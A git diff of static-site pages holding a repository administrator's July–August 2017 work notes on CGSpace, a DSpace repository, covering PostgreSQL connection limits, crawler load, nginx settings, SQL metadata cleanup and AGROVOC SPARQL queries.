  • CGSpace was unavailable briefly, and I saw this error in the DSpace log file:
  • +
+
2017-07-05 13:05:36,452 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
+org.postgresql.util.PSQLException: FATAL: remaining connection slots are reserved for non-replication superuser connections
+
    +
  • Looking at the pg_stat_activity table I saw there were indeed 98 active connections to PostgreSQL, and at this time the limit is 100, so that makes sense
  • +
  • Tsega restarted Tomcat and it’s working now
  • +
  • Abenet said she was generating a report with Atmire’s CUA module, so it could be due to that?
  • +
  • Looking in the logs I see this random error again that I should report to DSpace:
  • +
+
2017-07-05 13:50:07,196 ERROR org.dspace.statistics.SolrLogger @ COUNTRY ERROR: EU
+
    +
  • Seems to come from dspace-api/src/main/java/org/dspace/statistics/SolrLogger.java
  • +
+

2017-07-06

+
    +
  • Sisay tried to help by making a pull request for the RTB flagships but there are formatting errors, unrelated changes, and the flagship names are not in the style I requested
  • +
  • Abenet talked to CIP and they said they are actually ok with using collection names rather than adding a new metadata field
  • +
+

2017-07-13

+
    +
  • Remove UKaid from the controlled vocabulary for dc.description.sponsorship, as Department for International Development, United Kingdom is the correct form and it is already present (#334)
  • +
+

2017-07-14

+
    +
  • Sisay sent me a patch to add “Photo Report” to dc.type so I’ve added it to the 5_x-prod branch
  • +
+

2017-07-17

+
    +
  • Linode shut down our seventeen (17) VMs due to nonpayment of the July 1st invoice
  • +
  • It took me a few hours to find the ICT/Finance contacts to pay the bill and boot all the servers back up
  • +
  • Since the server was down anyways, I decided to run all system updates and re-deploy CGSpace so that the latest changes to input-forms.xml and the sponsors controlled vocabulary would go live
  • +
+

2017-07-20

+
    +
  • Skype chat with Addis team about the status of the CGIAR Library migration
  • +
  • Need to add the CGIAR System Organization subjects to Discovery Facets (test first)
  • +
  • Tentative list of dates for the migration: +
      +
    • August 4: aim to finish data cleanup and then give Peter a list of authors
    • +
    • August 18: ready to show System Office
    • +
    • September 4: all feedback and decisions (including workflows) from System Office
    • +
    • September 10/11: go live?
    • +
    +
  • +
  • Talk to Tsega and Danny about exporting/ingesting the blog posts from Drupal into DSpace?
  • +
  • Followup meeting on August 8/9?
  • +
  • Sent Abenet the 2415 records from CGIAR Library’s Historical Archive (10947/1) after cleaning up the author authorities and HTML entities in dc.contributor.author and dc.description.abstract using OpenRefine: +
      +
    • Authors: value.replace(/::\w{8}-\w{4}-\w{4}-\w{4}-\w{12}::600/,"")
    • +
    • Abstracts: replace(value,/<\/?\w+((\s+\w+(\s*=\s*(?:".*?"|'.*?'|[^'">\s]+))?)+\s*|\s*)\/?>/,'')
    • +
    +
  • +
+

2017-07-24

+
    +
  • Move two top-level communities to be sub-communities of ILRI Projects
  • +
+
$ for community in 10568/2347 10568/25209; do /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/27629 --child="$community"; done
+
    +
  • Discuss CGIAR Library data cleanup with Sisay and Abenet
  • +
+

2017-07-27

+
    +
  • Help Sisay with some transforms to add descriptions to the filename column of some CIAT Presentations he’s working on in OpenRefine
  • +
  • Marianne emailed a few days ago to ask why “Integrating Ecosystem Solutions” was not in the list of WLE Phase I Research Themes on the input form
  • +
  • I told her that I only added the themes that I saw in the WLE Phase I Research Themes community
  • +
  • Then Mia from WLE also emailed to ask where some WLE focal regions went, and I said I didn’t understand what she was talking about, as all we did in our previous work was rename the old “Research Themes” subcommunity to “WLE Phase I Research Themes” and add a new subcommunity for “WLE Phase II Research Themes”.
  • +
  • Discuss some modifications to the CCAFS project tags in CGSpace submission form and in the database
  • +
+

2017-07-28

+
    +
  • Discuss updates to the Phase II CCAFS project tags with Andrea from Macaroni Bros
  • +
  • I will do the renaming and untagging of items in the CGSpace database, and he will update his webservice with the latest project tags; I will get the XML for our input-forms.xml from here: https://ccafs.cgiar.org/export/ccafsproject
  • +
+

2017-07-29

+
    +
  • Move some WLE items into appropriate Phase I Research Themes communities and delete some empty collections in WLE Regions community
  • +
+

2017-07-30

+
    +
  • Start working on CCAFS project tag cleanup
  • +
  • More questions about inconsistencies and spelling mistakes in their tags, so I’ve sent some questions for followup
  • +
+

2017-07-31

+
    +
  • Looks like the final list of metadata corrections for CCAFS project tags will be:
  • +
+
delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-FP4_CRMWestAfrica';
+update metadatavalue set text_value='FP3_VietnamLED' where resource_type_id=2 and metadata_field_id=134 and text_value='FP3_VeitnamLED';
+update metadatavalue set text_value='PII-FP1_PIRCCA' where resource_type_id=2 and metadata_field_id=235 and text_value='PII-SEA_PIRCCA';
+delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-WA_IntegratedInterventions';
+
    +
  • Now just waiting to run them on CGSpace, and then apply the modified input forms after Macaroni Bros give me an updated list
  • +
  • Temporarily increase the nginx upload limit to 200MB for Sisay to upload the CIAT presentations
  • +
  • Looking at the CGSpace activity page, there are 52 Baidu bots concurrently crawling our website (I copied the activity page to a text file and grepped it)!
  • +
+
$ grep 180.76. /tmp/status | awk '{print $5}' | sort | uniq | wc -l
+52
+
    +
  • From looking at the dspace.log I see they are all using the same session, which means our Crawler Session Manager Valve is working
  • +
diff --git a/docs/2017-08/index.html b/docs/2017-08/index.html
new file mode 100644
index 000000000..f88f302eb
--- /dev/null
+++ b/docs/2017-08/index.html
@@ -0,0 +1,571 @@

August, 2017 | CGSpace Notes

August, 2017

+ +
+

2017-08-01

+
    +
  • Linode sent an alert that CGSpace (linode18) was using 350% CPU for the past two hours
  • +
  • I looked in the Activity pane of the Admin Control Panel and it seems that Google, Baidu, Yahoo, and Bing are all crawling with massive numbers of bots concurrently (~100 total, mostly Baidu and Google)
  • +
  • The good thing is that, according to dspace.log.2017-08-01, they are all using the same Tomcat session
  • +
  • This means our Tomcat Crawler Session Valve is working
  • +
  • But many of the bots are browsing dynamic URLs like: +
      +
    • /handle/10568/3353/discover
    • +
    • /handle/10568/16510/browse
    • +
    +
  • +
  • The robots.txt only blocks the top-level /discover and /browse URLs… we will need to find a way to forbid them from accessing these!
  • +
  • Relevant issue from DSpace Jira (semi resolved in DSpace 6.0): https://jira.duraspace.org/browse/DS-2962
  • +
  • It turns out that we’re already adding the X-Robots-Tag "none" HTTP header, but this only forbids the search engine from indexing the page, not crawling it!
  • +
  • Also, the bot has to successfully browse the page first so it can receive the HTTP header…
  • +
  • We might actually have to block these requests with HTTP 403 depending on the user agent (see the nginx sketch after this list)
  • +
  • Abenet pointed out that the CGIAR Library Historical Archive collection I sent July 20th only had ~100 entries, instead of 2415
  • +
  • This was due to newline characters in the dc.description.abstract column, which caused OpenRefine to choke when exporting the CSV
  • +
  • I exported a new CSV from the collection on DSpace Test and then manually removed the resulting blank lines in vim using :g/^$/d
  • +
  • Then I cleaned up the author authorities and HTML characters in OpenRefine and sent the file back to Abenet
  • +
+
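  • A sketch of what blocking those dynamic URLs for certain user agents might look like in our nginx config (untested, and the agent list is only an example):

location ~ /(discover|browse) {
    if ($http_user_agent ~* "(Baiduspider|Googlebot|bingbot|Yahoo)") {
        return 403;
    }
    proxy_pass http://tomcat_http;
}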

2017-08-02

+
    +
  • Magdalena from CCAFS asked if there was a way to get the top ten items published in 2016 (note: not the top items in 2016!)
  • +
  • I think Atmire’s Content and Usage Analysis module should be able to do this but I will have to look at the configuration and maybe email Atmire if I can’t figure it out
  • +
  • I had a look at the module configuration and couldn’t figure out a way to do this, so I opened a ticket on the Atmire tracker
  • +
  • Atmire responded about the missing workflow statistics issue a few weeks ago but I didn’t see it for some reason
  • +
  • They said they added a publication and saw the workflow stat for the user, so I should try again and let them know
  • +
+

2017-08-05

+
    +
  • Usman from CIFOR emailed to ask about the status of our OAI tests for harvesting their DSpace repository
  • +
  • I told him that the OAI appears to not be harvesting properly after the first sync, and that the control panel shows an “Internal error” for that collection:
  • +
+

CIFOR OAI harvesting

+
    +
  • I don’t see anything related in our logs, so I asked him to check for our server’s IP in their logs
  • +
  • Also, in the mean time I stopped the harvesting process, reset the status, and restarted the process via the Admin control panel (note: I didn’t reset the collection, just the harvester status!)
  • +
+

2017-08-07

+
    +
  • Apply Abenet’s corrections for the CGIAR Library’s Consortium subcommunity (697 records)
  • +
  • I had to fix a few small things, like moving the dc.title column away from the beginning of the row, deleting blank lines in the abstracts in vim using :g/^$/d, and adding the dc.subject[en_US] column back, as she had deleted it and DSpace didn’t detect the changes made there (we needed to blank the values instead)
  • +
+

2017-08-08

+
    +
  • Apply Abenet’s corrections for the CGIAR Library’s historic archive subcommunity (2415 records)
  • +
  • I had to add the dc.subject[en_US] column back with blank values so that DSpace could detect the changes
  • +
  • I applied the changes in 500 item batches
  • +
+

2017-08-09

+
    +
  • Run system updates on DSpace Test and reboot server
  • +
  • Help ICARDA upgrade their MELSpace to DSpace 5.7 using the docker-dspace container +
      +
    • We had to import the PostgreSQL dump to the PostgreSQL container using: pg_restore -U postgres -d dspace blah.dump
    • +
    • Otherwise, when using -O it messes up the permissions on the schema and DSpace can’t read it
    • +
    +
  • +
+

2017-08-10

+
    +
  • Apply last updates to the CGIAR Library’s Fund community (812 items)
  • +
  • Had to do some quality checks and column renames before importing, as either Sisay or Abenet renamed a few columns and the metadata importer wanted to remove/add new metadata for title, abstract, etc.
  • +
  • Also I applied the HTML entities unescape transform on the abstract column in Open Refine
  • +
  • I need to get an author list from the database for only the CGIAR Library community to send to Peter
  • +
  • It turns out that I had already used this SQL query in May, 2017 to get the authors from CGIAR Library:
  • +
+
dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9'))) group by text_value order by count desc) to /tmp/cgiar-library-authors.csv with csv;
+
    +
  • Meeting with Peter and CGSpace team +
      +
    • Alan to follow up with ICARDA about depositing in CGSpace; we want ICARDA and Drylands legacy content but not duplicates
    • +
    • Alan to follow up on dc.rights, where are we?
    • +
    • Alan to follow up with Atmire about a dedicated field for ORCIDs, based on the discussion in the June, 2017 DCAT meeting
    • +
    • Alan to ask about how to query external services like AGROVOC in the DSpace submission form
    • +
    +
  • +
  • Follow up with Atmire on the ticket about ORCID metadata in DSpace
  • +
  • Follow up with Lili and Andrea about the pending CCAFS metadata and flagship updates
  • +
+

2017-08-11

+
    +
  • CGSpace had load issues and was throwing errors related to PostgreSQL
  • +
  • I told Tsega to reduce the max connections from 70 to 40 because actually each web application gets that limit and so for xmlui, oai, jspui, rest, etc it could be 70 x 4 = 280 connections depending on the load, and the PostgreSQL config itself is only 100!
  • +
  • I learned this on a recent discussion on the DSpace wiki
  • +
  • I need to either look into setting up a database pool through JNDI or increase the PostgreSQL max connections
  • +
  • Also, I need to find out where the load is coming from (rest?) and possibly block bots from accessing dynamic pages like Browse and Discover instead of just sending an X-Robots-Tag HTTP header
  • +
  • I noticed that Google has bitstreams from the rest interface in the search index. I need to ask on the dspace-tech mailing list to see what other people are doing about this, and maybe start issuing an X-Robots-Tag: none there (see the nginx sketch after this list)!
  • +
+
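  • A sketch of what that might look like for the REST API in nginx (untested):

location /rest {
    add_header X-Robots-Tag "none";
    proxy_pass http://tomcat_http;
}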

2017-08-12

+
    +
  • I sent a message to the mailing list about the duplicate content issue with /rest and /bitstream URLs
  • +
  • Looking at the logs for the REST API on /rest, it looks like someone is hammering it with testing or something…
  • +
+
# awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 5
+    140 66.249.66.91
+    404 66.249.66.90
+   1479 50.116.102.77
+   9794 45.5.184.196
+  85736 70.32.83.92
+
    +
  • The top offender is 70.32.83.92 which is actually the same IP as ccafs.cgiar.org, so I will email the Macaroni Bros to see if they can test on DSpace Test instead
  • +
  • I’ve enabled logging of /oai requests on nginx as well so we can potentially determine bad actors here (also to see if anyone is actually using OAI!)
  • +
+
    # log oai requests
+    location /oai {
+        access_log /var/log/nginx/oai.log;
+        proxy_pass http://tomcat_http;
+    }
+

2017-08-13

+
    +
  • Macaroni Bros say that CCAFS wants them to check once every hour for changes
  • +
  • I told them to check every four or six hours
  • +
+

2017-08-14

+
    +
  • Run author corrections on CGIAR Library community from Peter
  • +
+
$ ./fix-metadata-values.py -i /tmp/authors-fix-523.csv -f dc.contributor.author -t correct -m 3 -d dspace -u dspace -p fuuuu
+
    +
  • There were only three deletions so I just did them manually:
  • +
+
dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='C';
+DELETE 1
+dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='WSSD';
+
    +
  • Generate a new list of authors from the CGIAR Library community for Peter to look through now that the initial corrections have been done
  • +
  • Thinking about resource limits for PostgreSQL again after last week’s CGSpace crash and related to a recently discussion I had in the comments of the April, 2017 DCAT meeting notes
  • +
  • In that thread Chris Wilper suggests a new default of 35 max connections for db.maxconnections (from the current default of 30), knowing that each DSpace web application gets to use up to this many on its own
  • +
  • It would be good to approximate what the theoretical maximum number of connections on a busy server would be, perhaps by looking to see which apps use SQL:
  • +
+
$ grep -rsI SQLException dspace-jspui | wc -l          
+473
+$ grep -rsI SQLException dspace-oai | wc -l  
+63
+$ grep -rsI SQLException dspace-rest | wc -l
+139
+$ grep -rsI SQLException dspace-solr | wc -l                                                                               
+0
+$ grep -rsI SQLException dspace-xmlui | wc -l
+866
+
    +
  • Of those five applications we’re running, only solr appears not to use the database directly
  • +
  • And JSPUI is only used internally (so it doesn’t really count), leaving us with OAI, REST, and XMLUI
  • +
  • Assuming each takes a theoretical maximum of 35 connections during a heavy load (35 * 3 = 105), that would put the connections well above PostgreSQL’s default max of 100 connections (remember a handful of connections are reserved for the PostgreSQL super user, see superuser_reserved_connections)
  • +
  • So we should adjust PostgreSQL’s max connections to be DSpace’s db.maxconnections * 3 + 3
  • +
  • This would allow each application to use up to db.maxconnections and not to go over the system’s PostgreSQL limit
  • +
  • Perhaps since CGSpace is a busy site with lots of resources we could actually use something like 40 for db.maxconnections
  • +
  • Also worth looking into is to set up a database pool using JNDI, as apparently DSpace’s db.poolname hasn’t been used since around DSpace 1.7 (according to Chris Wilper’s comments in the thread)
  • +
  • Need to go check the PostgreSQL connection stats in Munin on CGSpace from the past week to get an idea if 40 is appropriate
  • +
  • Looks like connections hover around 50:
  • +
+

PostgreSQL connections 2017-08

+
    +
  • Unfortunately I don’t have the breakdown of which DSpace apps are making those connections (I’ll assume XMLUI)
  • +
  • So I guess a limit of 30 (DSpace default) is too low, but 70 causes problems when the load increases and the system’s PostgreSQL max_connections is too low
  • +
  • For now I think maybe setting DSpace’s db.maxconnections to 40 and adjusting the system’s max_connections might be a good starting point: 40 * 3 + 3 = 123 (see the sketch after this list)
  • +
  • Apply 223 more author corrections from Peter on CGIAR Library
  • +
  • Help Magdalena from CCAFS with some CUA statistics questions
  • +
+
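  • As a sketch of that sizing logic (values still to be confirmed against Munin):

# dspace.cfg: per-webapp pool size
db.maxconnections = 40

# postgresql.conf: 3 webapps * 40 + 3 reserved = 123
max_connections = 123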

2017-08-15

+
    +
  • Increase the nginx upload limit on CGSpace (linode18) so Sisay can upload 23 CIAT reports
  • +
  • Do some last minute cleanups and de-duplications of the CGIAR Library data, as I need to send it to Peter this week
  • +
  • Metadata fields like dc.contributor.author, dc.publisher, dc.type, and a few others had somehow been duplicated along the line
  • +
  • Also, a few dozen dc.description.abstract fields still had various HTML tags and entities in them
  • +
  • Also, a bunch of dc.subject fields that were not AGROVOC had not been moved properly to cg.system.subject
  • +
+

2017-08-16

+
    +
  • I wanted to merge the various field variations like cg.subject.system and cg.subject.system[en_US] in OpenRefine but I realized it would be easier in PostgreSQL:
  • +
+
dspace=# select distinct text_value, text_lang from metadatavalue where resource_type_id=2 and metadata_field_id=254;
+
    +
  • And actually, we can do it for other generic fields for items in those collections, for example dc.description.abstract:
  • +
+
dspace=# update metadatavalue set text_lang='en_US' where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'abstract') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9')))
+
    +
  • And on others like dc.language.iso, dc.relation.ispartofseries, dc.type, dc.title, etc…
  • +
  • Also, to move fields from dc.identifier.url to cg.identifier.url[en_US] (because we don’t use the Dublin Core one for some reason):
  • +
+
dspace=# update metadatavalue set metadata_field_id = 219, text_lang = 'en_US' where resource_type_id = 2 AND metadata_field_id = 237;
+UPDATE 15
+
    +
  • Set the text_lang of all dc.identifier.uri (Handle) fields to be NULL, just like default DSpace does:
  • +
+
dspace=# update metadatavalue set text_lang=NULL where resource_type_id = 2 and metadata_field_id = 25 and text_value like 'http://hdl.handle.net/10947/%';
+UPDATE 4248
+
    +
  • Also update the text_lang of dc.contributor.author fields for metadata in these collections:
  • +
+
dspace=# update metadatavalue set text_lang=NULL where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9')));
+UPDATE 4899
+
    +
  • Wow, I just wrote this baller regex facet to find duplicate authors:
  • +
+
isNotNull(value.match(/(CGIAR .+?)\|\|\1/))
+
    +
  • This would be true if the authors were like CGIAR System Management Office||CGIAR System Management Office, which some of the CGIAR Library’s were
  • +
  • Unfortunately when you fix these in OpenRefine and then submit the metadata to DSpace it doesn’t detect any changes, so you have to edit them all manually via DSpace’s “Edit Item”
  • +
  • Ooh! And an even more interesting regex would match any duplicated author:
  • +
+
isNotNull(value.match(/(.+?)\|\|\1/))
+
    +
  • Which means it can also be used to find items with duplicate dc.subject fields (see the SQL sketch after this list)…
  • +
  • Finally sent Peter the final dump of the CGIAR System Organization community so he can have a last look at it
  • +
  • Post a message to the dspace-tech mailing list to ask about querying the AGROVOC API from the submission form
  • +
  • Abenet was asking if there was some way to hide certain internal items from the “ILRI Research Outputs” RSS feed (which is the top-level ILRI community feed), because Shirley was complaining
  • +
  • I think we could use harvest.includerestricted.rss = false but the items might need to be 100% restricted, not just the metadata
  • +
  • Adjust Ansible postgres role to use max_connections from a template variable and deploy a new limit of 123 on CGSpace
  • +
+
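  • A rough SQL sketch for finding such duplicates directly in the database (assuming the unqualified dc.subject field):

dspace=# select resource_id, text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id = (select metadata_field_id from metadatafieldregistry where metadata_schema_id=1 and element='subject' and qualifier is null) group by resource_id, text_value having count(*) > 1;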

2017-08-17

+
    +
  • Run Peter’s edits to the CGIAR System Organization community on DSpace Test
  • +
  • Uptime Robot said CGSpace went down for 1 minute, not sure why
  • +
  • Looking in dspace.log.2017-08-17 I see some weird errors that might be related?
  • +
+
2017-08-17 07:55:31,396 ERROR net.sf.ehcache.store.DiskStore @ cocoon-ehcacheCache: Could not read disk store element for key PK_G-aspect-cocoon://DRI/12/handle/10568/65885?pipelinehash=823411183535858997_T-Navigation-3368194896954203241. Error was invalid stream header: 00000000
+java.io.StreamCorruptedException: invalid stream header: 00000000
+
    +
  • Weird that these errors seem to have started on August 11th, the same day we had capacity issues with PostgreSQL:
  • +
+
# grep -c "ERROR net.sf.ehcache.store.DiskStore" dspace.log.2017-08-*
+dspace.log.2017-08-01:0
+dspace.log.2017-08-02:0
+dspace.log.2017-08-03:0
+dspace.log.2017-08-04:0
+dspace.log.2017-08-05:0
+dspace.log.2017-08-06:0
+dspace.log.2017-08-07:0
+dspace.log.2017-08-08:0
+dspace.log.2017-08-09:0
+dspace.log.2017-08-10:0
+dspace.log.2017-08-11:8806
+dspace.log.2017-08-12:5496
+dspace.log.2017-08-13:2925
+dspace.log.2017-08-14:2135
+dspace.log.2017-08-15:1506
+dspace.log.2017-08-16:1935
+dspace.log.2017-08-17:584
+
    +
  • There are none in 2017-07 either…
  • +
  • A few posts on the dspace-tech mailing list say this is related to the Cocoon cache somehow
  • +
  • I will clear the XMLUI cache for now and see if the errors continue (though perhaps shutting down Tomcat and removing the cache is more effective somehow?)
  • +
  • We tested the option for limiting restricted items from the RSS feeds on DSpace Test
  • +
  • I created four items, and only the two with public metadata showed up in the community’s RSS feed: +
      +
    • Public metadata, public bitstream ✓
    • +
    • Public metadata, restricted bitstream ✓
    • +
    • Restricted metadata, restricted bitstream ✗
    • +
    • Private item ✗
    • +
    +
  • +
  • Peter responded and said that he doesn’t want to limit items to be restricted just so we can change the RSS feeds
  • +
+

2017-08-18

+
    +
  • Someone on the dspace-tech mailing list responded with some tips about using the authority framework to do external queries from the submission form
  • +
  • He linked to some examples from DSpace-CRIS that use this functionality: VIAFAuthority
  • +
  • I wired it up to the dc.subject field of the submission interface using the “lookup” type and it works!
  • +
  • I think we can use this example to get a working AGROVOC query
  • +
  • More information about authority framework: https://wiki.lyrasis.org/display/DSPACE/Authority+Control+of+Metadata+Values
  • +
  • Wow, I’m playing with the AGROVOC SPARQL endpoint using the sparql-query tool:
  • +
+
$ ./sparql-query http://202.45.139.84:10035/catalogs/fao/repositories/agrovoc
+sparql$ PREFIX skos: <http://www.w3.org/2004/02/skos/core#>
+SELECT 
+    ?label 
+WHERE {  
+   {  ?concept  skos:altLabel ?label . } UNION {  ?concept  skos:prefLabel ?label . }
+   FILTER regex(str(?label), "^fish", "i") .
+} LIMIT 10;
+
+┌───────────────────────┐                                                      
+│ ?label                │                                                      
+├───────────────────────┤                                                      
+│ fisheries legislation │                                                      
+│ fishery legislation   │                                                      
+│ fishery law           │                                                      
+│ fish production       │                                                      
+│ fish farming          │                                                      
+│ fishing industry      │                                                      
+│ fisheries data        │                                                      
+│ fishing power         │                                                      
+│ fishing times         │                                                      
+│ fish passes           │                                                      
+└───────────────────────┘
+
+

2017-08-19

+
    +
  • More examples of SPARQL queries: https://github.com/rsinger/openlcsh/wiki/Sparql-Examples
  • +
  • Specifically the explanation of the FILTER regex
  • +
  • Might want to SELECT DISTINCT or increase the LIMIT to get terms like “wheat” and “fish” to be visible (see the revised query after this list)
  • +
  • Test queries online on the AGROVOC SPARQL portal: http://202.45.139.84:10035/catalogs/fao/repositories/agrovoc
  • +
+
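  • For example, a variation of the earlier query using SELECT DISTINCT and a higher LIMIT (untested):

PREFIX skos: <http://www.w3.org/2004/02/skos/core#>
SELECT DISTINCT ?label
WHERE {
   {  ?concept  skos:altLabel ?label . } UNION {  ?concept  skos:prefLabel ?label . }
   FILTER regex(str(?label), "^fish", "i") .
} LIMIT 100;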

2017-08-20

+
    +
  • Since I cleared the XMLUI cache on 2017-08-17 there haven’t been any more ERROR net.sf.ehcache.store.DiskStore errors
  • +
  • Look at the CGIAR Library to see if I can find the items that have been submitted since May:
  • +
+
dspace=# select * from metadatavalue where metadata_field_id=11 and date(text_value) > '2017-05-01T00:00:00Z';
+ metadata_value_id | item_id | metadata_field_id |      text_value      | text_lang | place | authority | confidence 
+-------------------+---------+-------------------+----------------------+-----------+-------+-----------+------------
+            123117 |    5872 |                11 | 2017-06-28T13:05:18Z |           |     1 |           |         -1
+            123042 |    5869 |                11 | 2017-05-15T03:29:23Z |           |     1 |           |         -1
+            123056 |    5870 |                11 | 2017-05-22T11:27:15Z |           |     1 |           |         -1
+            123072 |    5871 |                11 | 2017-06-06T07:46:01Z |           |     1 |           |         -1
+            123171 |    5874 |                11 | 2017-08-04T07:51:20Z |           |     1 |           |         -1
+(5 rows)
+
    +
  • According to dc.date.accessioned (metadata field id 11) there have only been five items submitted since May
  • +
  • These are their handles:
  • +
+
dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select item_id from metadatavalue where metadata_field_id=11 and date(text_value) > '2017-05-01T00:00:00Z');
+   handle   
+------------
+ 10947/4658
+ 10947/4659
+ 10947/4660
+ 10947/4661
+ 10947/4664
+(5 rows)
+

2017-08-23

+
    +
  • Start testing the nginx configs for the CGIAR Library migration as well as start making a checklist
  • +
+

2017-08-28

+
    +
  • Bram had written to me two weeks ago to set up a chat about ORCID stuff but the email apparently bounced and I only found out when he emailed me on another account
  • +
  • I told him I can chat in a few weeks when I’m back
  • +
+

2017-08-31

+
    +
  • I notice that in many WLE collections Marianne Gadeberg is in the edit or approval steps, but she is also in the groups for those steps.
  • +
  • I think we need to have a process to go back and check / fix some of these scenarios—to remove her user from the step and instead add her to the group—because we have way too many authorizations and in late 2016 we had performance issues with Solr because of this
  • +
  • I asked Sisay about this and hinted that he should go back and fix these things, but let’s see what he says
  • +
  • Saw CGSpace go down briefly today and noticed SQL connection pool errors in the dspace log file:
  • +
+
ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error
+org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
+
    +
  • Looking at the logs I see we have been having hundreds or thousands of these errors a few times per week in 2017-07 and almost every day in 2017-08
  • +
  • It seems that I changed the db.maxconnections setting from 70 to 40 around 2017-08-14, but Macaroni Bros also reduced their hourly hammering of the REST API then
  • +
  • Nevertheless, it seems like a connection limit is not enough and that I should increase it (as well as the system’s PostgreSQL max_connections)
  • +
diff --git a/docs/2017-09/index.html b/docs/2017-09/index.html
new file mode 100644
index 000000000..988f7e784
--- /dev/null
+++ b/docs/2017-09/index.html
@@ -0,0 +1,713 @@

September, 2017 | CGSpace Notes

September, 2017

+ +
+

2017-09-06

+
    +
